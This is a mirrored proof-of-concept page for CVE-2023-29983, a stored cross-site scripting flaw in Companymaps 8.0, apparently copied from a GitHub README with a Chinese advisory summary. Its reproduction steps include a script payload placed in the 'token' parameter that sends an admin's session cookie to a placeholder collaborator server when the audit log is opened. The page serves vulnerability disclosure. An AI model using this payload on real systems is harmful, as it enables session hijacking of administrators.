Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-29983 PoC — Companymaps 跨站脚本漏洞

Source
https://github.com/zPrototype/CVE-2023-29983
Associated Vulnerability
Title:Companymaps 跨站脚本漏洞 (CVE-2023-29983)
Description:Companymaps是Maximilian Vogt个人开发者的一个显示包含所有办公桌和员工的公司地图。 Companymaps V8.0版本存在跨站脚本漏洞,该漏洞源于存在存储型跨站脚本(XSS)漏洞。
Readme
# Exploit Title: Stored Cross Site Scripting
- Google Dork:
- Date: 27.04.2023
- Exploit Author: Lucas Noki (0xPrototype)
- Vendor Homepage: https://github.com/vogtmh
- Software Link: https://github.com/vogtmh/cmaps
- Version: 8.0
- Tested on: Mac, Windows, Linux
- CVE : CVE-2023-29983

*Description:*

The vulnerability found is Stored Cross Site Scripting. When the `rest/update/?token=` endpoint is hit with a request where the token parameter contains a malicious payload we have the possibility to sXSS. This happens because the input isn't sanitized. It gets written as is into the database. Then if an admin visits the auditlog tab, the request is taken out of the database and echoed directly into the page. This triggers the XSS everytime someone visits the auditlog or refreshes it.

*Steps to reproduce:*

1. Clone the repository and install the application
2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=
3. The payload used is: <script>new+Image().src=\`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}\`</script>
4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough.
5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog
6. Check your collaborator server. You should have a request where the admins cookie is the value of the c parameter

In a real world case you would need to wait for the admin to log into the application and open the auditlog tab.

Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.



## Request to the server:

<img src="image-20230430005643809.png" alt="image-20230430005643809" style="zoom:50%;" />

## Response from the collaborator after admin opens the audit log:

<img src="image-20230430010017153.png" alt="image-20230430010017153" style="zoom:50%;" />
File Snapshot

 [4.0K]  /data/pocs/648eb56d2022374ca82c29508e9eef1be2ab5e45
├── [116K]  image-20230430005643809.png
├── [351K]  image-20230430010017153.png
└── [1.9K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.